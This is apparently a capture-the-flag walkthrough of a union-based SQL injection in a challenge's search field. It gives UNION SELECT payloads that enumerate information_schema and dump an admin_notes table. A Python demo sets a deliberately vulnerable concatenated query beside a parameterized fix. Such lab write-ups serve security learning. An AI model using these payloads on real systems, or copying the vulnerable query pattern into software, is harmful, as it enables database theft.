
Infinity - SQL Injection - Broken Search

A walkthrough of exploiting a Union-based SQL Injection vulnerability in a broken search feature on the Infinity platform. By identifying the correct number of columns and injecting into a POST parameter, we successfully dumped sensitive data from the database.

Overview

A web application exposes a search feature that passes user input directly into a SQL query without sanitization. The goal is to exploit this using Union-based SQL Injection to enumerate the database and dump sensitive data.

Vulnerability: Union-based SQL Injection
Parameter: POST body — search field
Database: MariaDB (MySQL)


Step 1: Identify the Input Field

Open the challenge and locate the search input field.

[Screenshot: Input field]


Step 2: Test for SQL Injection

Inject a single quote ' to break the SQL syntax. The application returns a MariaDB error — confirming the input is unsanitized and the backend is MySQL-compatible.

[Screenshot: SQL error response]


Step 3: Determine Number of Columns

Use UNION SELECT to find how many columns the original query returns. Increment until no error appears.

1 column → Error: The used SELECT statements have a different number of columns

[Screenshot: 1 column error]

2 columns → Still errors

[Screenshot: 2 columns error]

3 columns → Success. Numbers 2 and 3 are reflected in the response, confirming injectable positions.

[Screenshot: 3 columns success]


Step 4: Enumerate the Database

With 3 columns confirmed, extract table names from information_schema.

```sql
' UNION SELECT 1,table_name,3 FROM information_schema.tables;-- -
```

Found a table: admin_notes

[Screenshot: Table enumeration]


Step 5: Dump Column Names

```sql
' UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_name='admin_notes';-- -
```

Columns found: id, note

[Screenshot: Column enumeration]


Step 6: Dump the Data

```sql
' UNION SELECT 1,note,3 FROM admin_notes;-- -
```

Successfully retrieved the contents of admin_notes.

[Screenshot: Data dump]
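
The broken search from Steps 2 to 6 reduced to a runnable Python/sqlite3 model, as an added example that is not part of the original post or the challenge: the concatenated query that lets the quote and UNION through, beside the parameterized fix that treats the same input as plain data. The admin_notes table and its note column follow the walkthrough; the products table, its rows and the note contents are constructed, and the Step 6 payload is used without its trailing ';' because sqlite3's execute() accepts a single statement.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    # Constructed sample data (not from the challenge): the catalogue the
    # search is meant to query, plus the admin_notes table the walkthrough dumps.
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE products (id INTEGER, name TEXT, price REAL);
        INSERT INTO products VALUES (1, 'widget', 9.99), (2, 'gadget', 19.99);
        CREATE TABLE admin_notes (id INTEGER, note TEXT);
        INSERT INTO admin_notes VALUES (1, 'constructed-secret-note');
        """
    )
    return conn


def search_vulnerable(conn: sqlite3.Connection, term: str) -> list:
    # The broken search: user input is spliced straight into the SQL text, so a
    # quote closes the string literal and everything after it is parsed as SQL.
    sql = f"SELECT id, name, price FROM products WHERE name LIKE '%{term}%'"
    return conn.execute(sql).fetchall()


def search_hardened(conn: sqlite3.Connection, term: str) -> list:
    # The fix: bind the term as a parameter. The driver hands it to the engine
    # as a value, so quotes, UNION and comment markers never reach the parser.
    sql = "SELECT id, name, price FROM products WHERE name LIKE ?"
    return conn.execute(sql, (f"%{term}%",)).fetchall()


# Step 6 payload from the walkthrough, minus the ';' (see lead-in). The three
# selected values match the three columns found in Step 3.
PAYLOAD = "' UNION SELECT 1,note,3 FROM admin_notes-- -"


def compare(term: str) -> tuple:
    # Returns (notes leaked by the vulnerable search, rows from the hardened one).
    conn = build_db()
    notes = {n for (n,) in conn.execute("SELECT note FROM admin_notes")}
    leaked = {row[1] for row in search_vulnerable(conn, term)} & notes
    return sorted(leaked), search_hardened(conn, term)


if __name__ == "__main__":
    print(compare(PAYLOAD))   # vulnerable leaks the note; hardened returns []
    print(compare("wid"))     # both return the matching product only
```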


Key Takeaways

  • Always test with ' and " — different databases react differently to each.
  • Column count detection is the first real step in any UNION-based attack; don’t skip it.
  • Reflected column positions tell you exactly where your output will appear — target those.
  • information_schema is your map — tables first, then columns, then data.

Happy Hacking!


This post is licensed under CC BY 4.0 by the author.